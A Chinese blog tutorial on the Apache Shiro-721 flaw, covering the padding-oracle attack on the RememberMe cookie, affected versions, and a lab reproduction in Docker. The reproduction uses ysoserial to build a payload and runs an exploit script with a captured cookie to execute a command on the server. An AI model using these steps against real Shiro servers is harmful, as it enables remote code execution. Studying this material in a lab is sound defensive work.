Shiro-721漏洞详解及复现

2024-09-04 10:52
文章标签 详解 漏洞 复现 shiro 721

本文主要是介绍Shiro-721漏洞详解及复现,希望对大家解决编程问题提供一定的参考价值,需要的开发者们随着小编来一起学习吧!

之前有些Shiro-550反序列化漏洞的文章Shiro-550漏洞详解及复现_shiro框架漏洞-CSDN博客

这里简单补充一下关于Shiro-721漏洞的内容。

目录

Shiro-721漏洞原理

Padding Oracle攻击

利用条件

影响版本

漏洞复现


Shiro-721漏洞原理

Shiro-721用到的加密方式是AES-128-CBC,跟Shiro-550最大的区别就是AES加密的key基本上猜不到了,是系统随机生成的。

但是这种加密方式容易受到Padding Oracle Attack(填充提示攻击),能够利用有效的RememberMe Cookie作为Padding Oracle Attack的前缀,然后精心构造RememberMe Cookie值可以实现反序列化漏洞攻击。实质是跟Shiro-550一样的。

Padding Oracle攻击

这里的Padding是“填充”的意思,因为对于加密算法来说(如DES),是要进行“填充”形成完整的块然后分段进行加密的。对于密文被解密时也是分段进行的,在解密完成之后算法会先检查是否符合规则,如果它的Padding填充方式不符合规则,那么表示输入数据有问题,会抛出一个Padding Error异常。

Padding Oracle攻击简单理解据说,黑客已知一个合法密文,可以通过不断向网站发送篡改过的密文,观察是否有Padding异常错误提示,如果有异常错误提示即可不断向网站程序提供密文,让解密程序给出错误提示,进而不断地修正,从而最终获得混淆之前的中间密文。拿到中间密文之后,就可以通过构造IV(初始向量),使得中间密文被逆向混淆之后得到的明文为指定内容,从而达到攻击的目的。

在这个过程中,Padding Oracle攻击并没有破解掉加密算法的密钥,也没有能力对任意密文做逆向解密,只是可以利用一个有效的密文,生成一个解密后得到任意指定内容明文的伪造密文。

利用条件

根据上面的眼原理也可以得出利用该漏洞需要以下几个条件:

  • 攻击者能够获取到密文,以及IV向量(相对于登录页面的就是知道正确的账号密码对应的Cookie)
  • 攻击者能够修改密文触发解密过程,解密成功和解密失败存在差异性(也就是说需要存在Shiro反序列化漏洞,且有类似于登录成功和失败这种差异)

影响版本

该漏洞影响版本为Apache Shiro 
1.2.5
1.2.6
1.3.0
1.3.1
1.3.2
1.4.0-RC2
1.4.0
1.4.1

漏洞复现

基于docker搭建

git clone https://github.com/inspiringz/Shiro-721.git
cd Shiro-721/Docker
docker build -t shiro-721 .
docker run -p 8080:8080 -d shiro-721

 

首先先使用ysoserial工具对恶意语句进行序列化

java -jar ysoserial.jar CommonsBeanutils1 "touch /tmp/123" > payload.class

登录成功后将其中的RememberMe字段复制到工具中进行利用:

python2 shiro_exp.py http://192.168.111.121:8080/login.jsp dn02+4V8ELKMLgay8k17HfDtU6eHyvqELqEebUmq5911xfqV2+GsXLDNAgG7qPJc1tQypjGVo/AVhJb5qwhe3vH5LBlqT5GLhz6STPMzvLaFG0xQBCNXsTfRgmBm0K2ZDO5SKW7sgFHmB91ayfrofoifYA5hH3CHYmEtZ7SqH1xEXH4/VT6NBe0h9akLvLyyVqPWkYD4Dv8NGA2EamH1vGSF72f3bEtO/9uBwqF69WVP1PhGB+1fZ7DMtBSsF8YvQkx8DbILhbX+jzItYfllnB/F1GfTPa/lCNTDiOcANaajJfB1i9qacQZvKEGXMeWG4Hx5oaRYm2lvgP/0TrohSJLXPyh1tEJTszxS9hdDhXb6QugkPC57jwT/T4aabZIJs4b05P3Ez+sdOGPtWA4QkxUmfUipigA/KuE1uJ2INRIm3YZlNR1sQ6H64YgJpFu5CrpoCLh2lGBP7Ip8IKeXPwDQpMi8E5gnCBVYBxBUNJ6cs4Y2h+iDpeu/mjAEgkJX payload.class

这里的shiro_exp.py下载地址是:https://github.com/wuppp/shiro_rce_exp

这里是将cookie的RememberMe的部分作为前缀,然后放入工具进行爆破,爆破大概需要一个小时左右,需要耐心等待,爆破成功后就停止,并且返回cookie。

最终跑出的cookie拼接到请求中,可以在/tmp目录下看到创建的文件。

这篇关于Shiro-721漏洞详解及复现的文章就介绍到这儿,希望我们推荐的文章对编程师们有所帮助!



http://www.chinasem.cn/article/1135824

相关文章

Linux换行符的使用方法详解

《Linux换行符的使用方法详解》本文介绍了Linux中常用的换行符LF及其在文件中的表示,展示了如何使用sed命令替换换行符,并列举了与换行符处理相关的Linux命令,通过代码讲解的非常详细,需要的... 目录简介检测文件中的换行符使用 cat -A 查看换行符使用 od -c 检查字符换行符格式转换将

详解C#如何提取PDF文档中的图片

《详解C#如何提取PDF文档中的图片》提取图片可以将这些图像资源进行单独保存,方便后续在不同的项目中使用,下面我们就来看看如何使用C#通过代码从PDF文档中提取图片吧... 当 PDF 文件中包含有价值的图片,如艺术画作、设计素材、报告图表等,提取图片可以将这些图像资源进行单独保存,方便后续在不同的项目中使

Android中Dialog的使用详解

《Android中Dialog的使用详解》Dialog(对话框)是Android中常用的UI组件,用于临时显示重要信息或获取用户输入,本文给大家介绍Android中Dialog的使用,感兴趣的朋友一起... 目录android中Dialog的使用详解1. 基本Dialog类型1.1 AlertDialog(

C#数据结构之字符串(string)详解

《C#数据结构之字符串(string)详解》:本文主要介绍C#数据结构之字符串(string),具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝赐教... 目录转义字符序列字符串的创建字符串的声明null字符串与空字符串重复单字符字符串的构造字符串的属性和常用方法属性常用方法总结摘

Java中StopWatch的使用示例详解

《Java中StopWatch的使用示例详解》stopWatch是org.springframework.util包下的一个工具类,使用它可直观的输出代码执行耗时,以及执行时间百分比,这篇文章主要介绍... 目录stopWatch 是org.springframework.util 包下的一个工具类,使用它

Java进行文件格式校验的方案详解

《Java进行文件格式校验的方案详解》这篇文章主要为大家详细介绍了Java中进行文件格式校验的相关方案,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录一、背景异常现象原因排查用户的无心之过二、解决方案Magandroidic Number判断主流检测库对比Tika的使用区分zip

Java实现时间与字符串互相转换详解

《Java实现时间与字符串互相转换详解》这篇文章主要为大家详细介绍了Java中实现时间与字符串互相转换的相关方法,文中的示例代码讲解详细,感兴趣的小伙伴可以跟随小编一起学习一下... 目录一、日期格式化为字符串(一)使用预定义格式(二)自定义格式二、字符串解析为日期(一)解析ISO格式字符串(二)解析自定义

springboot security快速使用示例详解

《springbootsecurity快速使用示例详解》:本文主要介绍springbootsecurity快速使用示例,具有很好的参考价值,希望对大家有所帮助,如有错误或未考虑完全的地方,望不吝... 目录创www.chinasem.cn建spring boot项目生成脚手架配置依赖接口示例代码项目结构启用s

Python中随机休眠技术原理与应用详解

《Python中随机休眠技术原理与应用详解》在编程中,让程序暂停执行特定时间是常见需求,当需要引入不确定性时,随机休眠就成为关键技巧,下面我们就来看看Python中随机休眠技术的具体实现与应用吧... 目录引言一、实现原理与基础方法1.1 核心函数解析1.2 基础实现模板1.3 整数版实现二、典型应用场景2

一文详解SpringBoot响应压缩功能的配置与优化

《一文详解SpringBoot响应压缩功能的配置与优化》SpringBoot的响应压缩功能基于智能协商机制,需同时满足很多条件,本文主要为大家详细介绍了SpringBoot响应压缩功能的配置与优化,需... 目录一、核心工作机制1.1 自动协商触发条件1.2 压缩处理流程二、配置方案详解2.1 基础YAML